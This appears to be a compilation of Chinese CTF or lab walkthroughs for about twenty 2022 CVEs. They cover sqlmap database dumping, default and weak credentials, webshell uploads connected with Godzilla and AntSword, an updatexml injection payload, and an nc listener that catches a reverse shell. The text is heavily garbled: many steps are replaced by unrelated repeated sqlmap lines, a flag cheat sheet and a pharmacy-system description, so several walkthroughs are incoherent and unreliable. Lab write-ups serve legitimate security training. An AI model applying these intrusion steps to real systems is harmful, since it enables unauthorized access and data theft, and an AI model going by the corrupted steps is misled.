CVE-2022-32991 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-32991
靶标介绍:
该CMS的welcome.php中存在SQL注入攻击。
开启靶场
首先注册用户
进入到主页发现就是 welcome.php
根据CVE官方:在 welcome.php,发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞。观察该页面 URL,发现虽然为 welcome.php,但参数并不是 eid,继续查找其他页面,点击第一栏 Start 进行跳转,发现存在 welcome.php 和 eid 参数
Burpsuite 抓包
保存为 1.txt,发现存在注入
python sqlmap.py -r 1.txt --batch
暴库
python sqlmap.py -r 1.txt --batch --dbs
暴表
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
暴名
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
暴数据
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
CVE-2022-30887 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-30887
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
开启场景
发现是需要登录的,并且不能注册,滑到页面最下方,点击 Mayuri K
跳转页面之后最下方找到
Efficient Garments Management System Project In PHP And MySQL: Free Download
点击进去之后,等待几秒,自动弹出邮箱
[email protected]
密码就是:mayurik,其实也是此 cms 的默认账号密码,登录
发现在 Add Medicine 中可以进行文件上传
Add Medicine 页面上传木马
python sqlmap.py -r 1.txt --batch
0
上传成功,发现已经存在
右键复制图像链接
python sqlmap.py -r 1.txt --batch
1
访问发现 phpinfo 已经执行
利用木马进行命令执行
python sqlmap.py -r 1.txt --batch
2
python sqlmap.py -r 1.txt --batch
3
CVE-2022-29464 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-29464
python sqlmap.py -r 1.txt --batch
4
打开环境是一个登录界面
题目也给我们提示了 WSO2文件上传漏洞(CVE-2022-29464),直接去GitHub搜一个exp直接运行就行
python sqlmap.py -r 1.txt --batch
5
使用指令:
python sqlmap.py -r 1.txt --batch
6
然后访问如下图路径即可
python sqlmap.py -r 1.txt --batch
7
python sqlmap.py -r 1.txt --batch
8
CVE-2022-28525 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-28525
python sqlmap.py -r 1.txt --batch
9
打开环境后弱口令 admin:admin 登录
登录成功后寻找上传点,Users -> Add User
上传成功
复制图片链接
哥斯拉测试连接
找到 flag
CVE-2022-28512 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-28512
python sqlmap.py -r 1.txt --batch --dbs
0
弱口令 admin:admin 进入后台
然后发现不在后台,在 index 页面的
发现 id 参数
bp 抓包保存流量包
sqlmap 一把梭,存在注入点
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch --dbs
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
CVE-2022-28060 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-28060
python sqlmap.py -r 1.txt --batch --dbs
6
找到 /includes/login.php
bp 抓包
sqlmap 找到注入点
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch --dbs
8
或者使用 Sqlmap 获取 flag,通过 –sql-shell 再传入 load_file 进行文件读取:
python sqlmap.py -r 1.txt --batch --dbs
9
CVE-2022-26965 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-26965
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
0
打开环境进入 admin 登录页面
弱口令 admin 登录
在主题中可利用文件上传
GitHub 寻找开源主题,阅读源码,发现安装主题会读取并执行主题中Info.php。修改 info.php 代码。
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
1
更改后重新打包压缩包上传
救
因为写入木马中得文件名为 shell.php,直接访问,发现 phpinfo 执行
获取 flag
或者直接使用别人写好的 exp,有一点需要注意,默认的路径没有 /pluck
访问给出的 url
CVE-2022-26201 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-26201
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
2
打开环境,首先注册一个账号
注册完登录
找到注入点
sqlmap 一把梭
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
3
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
4
分类.php 界面同样存在注入漏洞
输入值,抓包保存
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch --dbs
8
CVE-2022-25578 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25578
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
7
打开环境
拼接 admin 进行后台登陆
利用默认口令 admin:tao 登录
第一种方法:.htaccess文件执行任意代码
在文件管理中找到 .htaccess 文件
编辑为
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
8
在文章管理->添加文章中上传缩略图
接着在 picture 中找到
拼接路径到 url,phpinfo 成功执行
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
9
蚁剑连接
得到flag
第二种方法:已知路径,直接包含
任意选择一个 php 文件编写代码上传,我这里选择的是 config.php
编辑
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
0
访问 config.php 回显出 phpinfo
蚁剑连接
CVE-2022-25488 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25488
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
1
打开场景,打开是空白的,据题目提示可以查看 /admin/ajax
访问 avatar.php 页面
加上 id=1
进行 sql 注入探测
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
2
直接利用 load_file 进行 flag 读取
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
3
CVE-2022-25411 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25411
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
4
开启环境
dirsearch 扫描到 robots.txt 文件,访问得到后台地址 admin
提示的有弱口令,bp爆破
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
5
找到文件上传位置
在底部新增允许上传 php 文件
选择上传 php 的 shell
点击 url 弹出 php 图片地址
哥斯拉连接
CVE-2022-25401 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25401
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
6
打开环境,发现没有 administrator/,dirb 扫描
访问 templates/default/html/windows/ 发现 right.php 存在
在right.php的53行中存在
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
7
kali 的 curl 请求访问根目录下的 flag 文件
curl 是一种命令行工具,作用是发出网络请求,然后得到和提取数据,显示在“标准输出” (stdout) 上面。它支持多种协议 查看网页源码 直接在 curl 命令后加上网址,就可以看到网页源码。
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
8
CVE-2022-25099 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25099
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
9
打开环境,dirb 扫描
访问 admin 页面,弱口令 admin:123456 登录
附加组件 -> 种语言
上传
python sqlmap.py -r 1.txt --batch
0
phpinfo 执行
未找到上传地址,那就直接上传命令执行
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
1
CVE-2022-24663 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24663
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
2
打开环境,右下角发现:自豪地采用 WordPress
WordPress 默认登录页面为 wp-login.php,访问
提示存在常见用户名低权限用户弱口令,bp 爆破出为 test:test
登录
提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码
这里指的是任意 PHP 代码并且是任意位置
随便找个 html 页面进行 exp 注入
插入
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
3
php 解析
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
4
点击执行,出现 success 则说明上传成功
访问 fuck.php,发现 phpinfo 成功执行
蚁剑连接
找到 flag
或者
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
5
CVE-2022-24263 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24263
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
6
三个页面随便选一个
bp 抓包
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
8
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
9
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
0
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
1
CVE-2022-24223 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24223
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
2
dirsearch 扫描到登录界面
访问
bp 抓包
python sqlmap.py -r 1.txt --batch
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
4
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
5
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
6
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
7
CVE-2022-24124 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24124
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
8
概念验证
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
9
官方 poc
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
0
报错注入查数据库版本:
查询数据库报错
可以通过注入 XPATH 函数来利用此漏洞。字段参数中的 UpdateXML() 或 ExtractValue() 以生成错误并获取查询输出。
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
1
每当 XPATH 查询的语法不正确时,我们都会看到一条错误消息,转储 SQL 查询的输出:
XPATH 语法错误:
casdoor:错误 1105:仅支持常量 XPATH 查询
报错:casdoor:错误1105仅支持常量xpath查询
明明updatexml函数是可以利用XPATH函数查询的,比如,可以查版本:
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
2
我们查库的时候就不可以了:
&field=updatexml(0,concat(0x7e,(database()),0x7e),0)
这时是因为输出的内容在响应包和页面中被限制了
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
3
burp 爆破字符
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
4
正确和错误回显是不同的,下图为正确的
CVE-2022-24112 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24112
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
5
poc 地址
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
6
VPS开启监听:nc -lvvp 12345
进入POC目录运行:
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
7
反弹成功得到 flag
CVE-2022-23906 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-23906
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
8
dirsearch 扫描
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
9
访问 /admin/login.php ,抓包爆破得到 admin:123456
找上传点
插入图片
复制图片
改后缀为 php
复制链接
哥斯拉连接
获取 flag
CVE-2022-23880 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-23880
Efficient Garments Management System Project In PHP And MySQL: Free Download
0
拼接 admin 进行后台登陆
利用默认口令 admin:tao 登录
新建文件 CVE-2022-23880.php
编辑
Efficient Garments Management System Project In PHP And MySQL: Free Download
1
复制链接,哥斯拉连接
找到 flag
长按二维码识别关注
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...